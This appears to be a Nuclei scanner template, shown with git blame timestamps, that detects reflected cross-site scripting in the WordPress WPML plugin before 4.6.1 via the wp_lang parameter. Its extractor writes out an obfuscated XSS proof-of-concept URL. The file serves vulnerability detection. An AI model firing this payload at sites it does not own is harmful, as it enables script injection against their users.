nuclei-templates/http/vulnerabilities/wordpress/wpml-xss.yaml

43 lines
1.2 KiB
YAML
Raw Normal View History

2023-05-01 15:48:57 +00:00
id: wpml-xss
info:
name: WordPress Plugin WPML Version < 4.6.1 Cross-Site Scripting
author: bugvsme
severity: medium
description: |
WordPress Plugin WPML Version < 4.6.1 is vulnerable to RXSS via wp_lang parameter.
2023-10-14 11:27:55 +00:00
remediation: |
Update the WPML plugin to 4.6.1 version.
2023-05-01 15:48:57 +00:00
reference:
- https://wpml.org/fr/changelog/2023/03/wpml-4-6-1-important-security-update/
- https://twitter.com/bug_vs_me/status/1652789903766200320
2023-05-02 05:33:28 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-10-14 11:27:55 +00:00
max-request: 1
2023-05-02 05:33:28 +00:00
tags: xss,wp,wordpress,wpml,wp-plugin
2023-05-01 15:48:57 +00:00
http:
- method: GET
path:
- '{{BaseURL}}/wp-login.php?wp_lang=en_US%27'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- '#039;"='
- 'wpml_lang'
condition: and
extractors:
- type: dsl
dsl:
2023-10-14 11:27:55 +00:00
- 'host + "/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(domain)%0c"'
# digest: 490a0046304402204eedbf4fc648279f1cda703c597974e6e810d7c372103ac46e82c81f39c5189a0220191a25798673fe2f349854b3b61c04b67569864f95dcb6f905b322d13839bd2e:922c64590222798bb761d5b6d8e72950